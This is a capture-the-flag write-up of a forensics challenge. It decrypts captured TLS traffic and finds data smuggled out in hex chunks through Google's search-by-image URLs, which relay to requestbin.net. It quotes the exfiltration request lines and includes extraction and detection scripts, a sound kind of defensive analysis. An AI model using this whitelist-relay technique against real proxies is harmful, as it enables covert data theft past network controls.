Tags: forensics 


# INS'hAck 2019

[ https://ctftime.org/event/763 ]

## Passthru

> You're part of a company security team and the admin has recently enabled interception on the company filtering proxy. The admin is pretty confident when it comes to its domain whitelist. He gave you a [capture](https://static.ctf.insecurity-insa.fr/13140c280d45224949bfe7fc1b978c6b97ddd55d.tar.gz) to review. Time to prove him wrong.

[ **forensics** : 206pts ]

Extracting the given [download](https://static.ctf.insecurity-insa.fr/13140c280d45224949bfe7fc1b978c6b97ddd55d.tar.gz) and then unzipping `passthru.zip` gives two files: `capture.pcap` and `sslkey.log`.


Inspecting `capture.pcap` in Wireshark required setting the `(PRE)-Master-Secret log filename` (in the TLS protocol preferences) to point at `sslkey.log` in order to view the decrypted `TLS` data.

After spending a while examining the decrypted packet data, the only thing that seemed to call for a closer investigation was the URL mentioned in repeated `GET` requests to [images.google.com](https://images.google.com/):

```
GET /searchbyimage?image_url=http%3A%2F%2Frequestbin.net%2Fr%2Fzk2s2ezk%3Fid%3D82290383-7480-487c-b78b-77ac769c56cd%26kcahsni%3D9ef773fe97f56554a3b4&encoded_image=&image_content=&filename=&hl=fr HTTP/1.1
```

URL-decoding the `image_url` querystring parameter makes it a little easier to read:

```
http://requestbin.net/r/zk2s2ezk?id=82290383-7480-487c-b78b-77ac769c56cd&kcahsni=9ef773fe97f56554a3b4
```

Visiting the image URL and taking a deeper look at [requestbin.net](http://requestbin.net/) uncovered nothing special. However, the parameter name `kcahsni`, which is `inshack` (the name of the CTF) spelled backwards, suggested looking further, and it soon became obvious that the hex characters following `kcahsni` changed with each subsequent `GET` request. The whitelisted site was being used as a relay: the proxy only ever sees `images.google.com`, while Google fetches the `requestbin.net` URL, and each fetch carries another chunk of data out. Concatenating these values together to see if they revealed the flag was the logical next step.

The following commands extract all the querystring parameters into a file called `queries.txt` (the `editcap` command was only necessary because `tshark` kept erroring, as the final packet in the original `pcap` was truncated):

```shell
editcap -r capture.pcap fixed.pcap 1-5438
tshark -r fixed.pcap -o 'ssl.keylog_file:sslkey.log' -Y 'http contains "GET /searchbyimage"' -T fields -e http.request.uri.query.parameter > queries.txt
```

And the script below then extracts and concatenates all the `kcahsni` hex values before decoding them.

```python
# Each line of queries.txt is a comma-separated list of parameters; the first
# is image_url=..., and the kcahsni hex value starts at a fixed offset (109)
# because the prefix of the encoded URL is identical in every request.
hexstr = ''
with open('queries.txt', 'rt') as f:
    hexstr = ''.join([param.split(',')[0][109:].strip() for param in f.readlines()])

# latin1 maps every byte to a character, so decoding can never fail
out = bytes.fromhex(hexstr).decode('latin1')
print(out)
```

The output wasn't pretty, but the flag is relatively obvious.


A little string slicing and reversing, `print(out[102:32:-1])`, then cleans up the flag:


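As an added example (not code from the original writeup), the same reassembly done without the fixed `[109:]` slice: the nested `image_url` is URL-decoded with `urllib.parse` and `kcahsni` is pulled out by name, and the script also reports which hosts the whitelisted site was asked to fetch on the client's behalf, which is the check a proxy admin would want. The request lines and hex chunks are constructed samples, not the capture's contents.

```python
from urllib.parse import parse_qs, urlsplit

# Hosts the proxy whitelist is meant to allow (assumed for this example).
WHITELIST = {"images.google.com"}

# Constructed sample request lines in the shape seen in the capture; the hex
# chunks encode "sample-exfil-data", not the flag from the challenge.
SAMPLE_REQUESTS = [
    "GET /searchbyimage?image_url=http%3A%2F%2Frequestbin.net%2Fr%2Fzk2s2ezk"
    "%3Fid%3D82290383-7480-487c-b78b-77ac769c56cd%26kcahsni%3D73616d706c65&hl=fr HTTP/1.1",
    "GET /search?q=weather HTTP/1.1",  # unrelated traffic, must be ignored
    "GET /searchbyimage?image_url=http%3A%2F%2Frequestbin.net%2Fr%2Fzk2s2ezk"
    "%3Fid%3D82290383-7480-487c-b78b-77ac769c56cd%26kcahsni%3D2d657866696c&hl=fr HTTP/1.1",
    "GET /searchbyimage?image_url=http%3A%2F%2Frequestbin.net%2Fr%2Fzk2s2ezk"
    "%3Fid%3D82290383-7480-487c-b78b-77ac769c56cd%26kcahsni%3D2d64617461&hl=fr HTTP/1.1",
]


def extract_nested_url(request_line):
    """Return the decoded image_url of a /searchbyimage GET, or None."""
    parts = request_line.split()
    if len(parts) < 2 or parts[0] != "GET":
        return None
    target = urlsplit(parts[1])
    if target.path != "/searchbyimage":
        return None
    # parse_qs percent-decodes the value, so the nested URL comes back intact
    return parse_qs(target.query).get("image_url", [None])[0]


def nested_hosts(request_lines):
    """Hosts that the whitelisted site would fetch; the proxy never sees them."""
    hosts = set()
    for line in request_lines:
        nested = extract_nested_url(line)
        if nested is not None:
            hosts.add(urlsplit(nested).hostname)
    return hosts - WHITELIST


def reassemble_chunks(request_lines, param="kcahsni"):
    """Concatenate every hex chunk carried in `param` and decode it."""
    hexstr = ""
    for line in request_lines:
        nested = extract_nested_url(line)
        if nested is None:
            continue
        hexstr += "".join(parse_qs(urlsplit(nested).query).get(param, []))
    return bytes.fromhex(hexstr).decode("latin1")


if __name__ == "__main__":
    print("hosts fetched via whitelisted site:", nested_hosts(SAMPLE_REQUESTS))
    print("reassembled:", reassemble_chunks(SAMPLE_REQUESTS))
```

Feeding it the real `queries.txt` lines needs only the `GET ` prefix and the path reconstructed, or the `http.request.uri` field exported from `tshark` instead of the split parameters.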
Original writeup (https://github.com/zhengzufu/ctf/tree/master/2019/2019-05-03-inshack#passthru).